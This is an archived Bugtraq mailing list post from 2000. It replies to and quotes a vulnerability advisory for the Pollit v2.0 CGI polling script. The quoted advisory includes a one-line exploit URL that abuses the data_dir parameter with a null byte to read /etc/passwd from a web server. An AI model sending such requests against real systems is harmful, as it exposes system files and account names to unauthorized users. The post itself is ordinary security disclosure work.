Bugtraq mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Pollit CGI-script opens doors!

From: vision () WHITEHATS COM (Max Vision)
Date: Tue, 11 Jul 2000 11:01:57 -0700

This was already reported to Bugtraq by Adrian Daminato on July 6th.
http://www.securityfocus.com/bid/1431

On Tue, 11 Jul 2000, The Warlock wrote:

Description: Bug in Poll_It_SSI_v2.0.cgi reveals info.
Compromise: Accessing files that arn't in the web-dir.
Vulnerable Systems: Pollit v2.0 (only tested version).
Details:
When you run the Pollit CGI script ALL your world readable files could
be accessed by any web user, for example your /etc/passwd file could be
opened to get valid usernames and maybe passwords.

How to exploit this bug?
Simply request

http://www.targethost.com/pollit/Poll_It_v2.0.cgi?data_dir=\etc\passwd%00

and the passwd file is presented in your browser.

Files that are world readable could be accessed.

Solution:
I'am not aware of any solution probably debuging or removeing the script
is the best solution.

BR,

Jan van de Rijt aka The Warlock.

--------------------------------------------------
visit The BioHazard HQ,
             http://go.to/biohazardhq
Tools, RFC's, Rainbow-books, Virii and more.
--------------------------------------------------
Previous By Date Next
Previous By Thread Next

Current thread: